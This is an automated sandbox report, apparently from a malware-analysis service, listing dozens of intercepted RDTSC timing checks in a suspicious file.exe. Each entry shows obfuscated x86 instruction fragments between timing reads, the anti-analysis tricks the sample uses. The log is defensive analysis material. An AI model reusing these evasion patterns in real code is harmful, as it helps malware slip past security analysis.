                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112BB78 second address: 1108746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F0DED622D87h 0x0000000c nop 0x0000000d movsx ecx, si 0x00000010 lea eax, dword ptr [ebp+124918F1h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F0DED622D78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D2CA5h], ebx 0x00000036 sub dword ptr [ebp+122D1A2Ah], ecx 0x0000003c push eax 0x0000003d push edi 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 jbe 00007F0DED622D76h 0x00000047 popad 0x00000048 pop edi 0x00000049 mov dword ptr [esp], eax 0x0000004c push eax 0x0000004d mov ecx, edx 0x0000004f pop edi 0x00000050 call dword ptr [ebp+122D25D3h] 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C043 second address: 112C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C2BD second address: 112C2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C2C2 second address: 112C321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0DECD24179h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0DECD24174h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0DECD24172h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C321 second address: 112C33B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D7Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C607 second address: 112C60D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C6D2 second address: 112C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0DED622D78h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBAE second address: 112CBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBB2 second address: 112CBBF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBBF second address: 112CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBC5 second address: 112CC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0DED622D89h 0x0000000c nop 0x0000000d jnp 00007F0DED622D78h 0x00000013 mov ch, 8Dh 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F0DED622D78h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jmp 00007F0DED622D7Dh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jg 00007F0DED622D8Ah 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CED1 second address: 112CEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D034 second address: 112D03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC2AA second address: 10DC2BD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0DECD24166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159CA8 second address: 1159CDA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0DED622D76h 0x00000008 ja 00007F0DED622D76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F0DED622D81h 0x00000015 popad 0x00000016 push ecx 0x00000017 push edi 0x00000018 jmp 00007F0DED622D7Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159E3F second address: 1159E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159FCE second address: 1159FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159FD2 second address: 1159FDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159FDC second address: 1159FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159FE2 second address: 1159FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159FE6 second address: 115A007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0DED622DA4h 0x0000000c push ecx 0x0000000d jmp 00007F0DED622D82h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A15A second address: 115A16C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A16C second address: 115A172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A172 second address: 115A176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A176 second address: 115A17A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A17A second address: 115A1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0DECD24166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0DECD2416Bh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F0DECD24175h 0x00000019 pushad 0x0000001a je 00007F0DECD24166h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11601F2 second address: 11601FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11601FA second address: 1160209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0DECD24166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160209 second address: 116020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EBD8 second address: 115EC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jg 00007F0DECD24166h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jmp 00007F0DECD24176h 0x00000018 jc 00007F0DECD2416Eh 0x0000001e jbe 00007F0DECD24166h 0x00000024 pushad 0x00000025 popad 0x00000026 jc 00007F0DECD2416Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115ED7E second address: 115ED82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115ED82 second address: 115ED97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115ED97 second address: 115ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115ED9F second address: 115EDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EF00 second address: 115EF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EF07 second address: 115EF0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F3BF second address: 115F3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F962 second address: 115F984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jns 00007F0DECD2416Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F984 second address: 115F98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F98E second address: 115F992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160032 second address: 1160038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160038 second address: 1160041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160041 second address: 116004B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116004B second address: 1160059 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0DECD24166h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160059 second address: 116005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116005D second address: 1160066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160066 second address: 116006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168D78 second address: 1168D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168D7E second address: 1168D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F0DED622D7Ah 0x0000000c je 00007F0DED622D76h 0x00000012 jbe 00007F0DED622D76h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116901F second address: 1169023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169023 second address: 1169029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169029 second address: 116905B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24179h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F0DECD24166h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 jo 00007F0DECD2416Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11692FD second address: 1169308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169308 second address: 116930C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169731 second address: 1169735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169735 second address: 116976A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24176h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jno 00007F0DECD24166h 0x00000012 jmp 00007F0DECD2416Dh 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116976A second address: 116976E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170205 second address: 1170209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170209 second address: 117021D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0DED622D76h 0x00000008 je 00007F0DED622D76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117021D second address: 1170221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170221 second address: 1170225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170225 second address: 117022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117022B second address: 1170231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FC24 second address: 116FC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F0DECD24166h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FC33 second address: 116FC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FC37 second address: 116FC41 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0DECD24166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FD80 second address: 116FDA2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DED622D84h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FDA2 second address: 116FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117268A second address: 1172699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D7Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172699 second address: 11726B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F0DECD24166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0DECD2416Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11726B7 second address: 11726BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172299 second address: 11722B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0DECD24175h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11722B5 second address: 11722B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11722B9 second address: 11722BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11722BF second address: 11722C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11722C9 second address: 11722D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0DECD24166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177B94 second address: 1177BA0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DED622D76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177BA0 second address: 1177BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117704B second address: 1177059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F0DED622D76h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177059 second address: 117705D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117705D second address: 1177063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177420 second address: 1177424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D460 second address: 117D466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D466 second address: 117D46A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BE2D second address: 117BE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CA13 second address: 112CA5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0DECD2416Bh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+12480DA4h], edi 0x00000018 push 00000004h 0x0000001a movzx edx, di 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0DECD24177h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CA5F second address: 112CA64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C62C second address: 117C669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0DECD2416Ah 0x0000000a popad 0x0000000b jnp 00007F0DECD24192h 0x00000011 jbe 00007F0DECD2416Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 jbe 00007F0DECD24166h 0x0000001f push ebx 0x00000020 jmp 00007F0DECD24176h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C7D7 second address: 117C7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D167 second address: 117D189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F0DECD24166h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0DECD2416Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D189 second address: 117D198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D198 second address: 117D1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0DECD2416Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117FD09 second address: 117FD24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0DED622D86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117FD24 second address: 117FD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0DECD24166h 0x00000009 jmp 00007F0DECD2416Ch 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F0DECD24166h 0x00000019 jng 00007F0DECD24166h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118016C second address: 1180176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
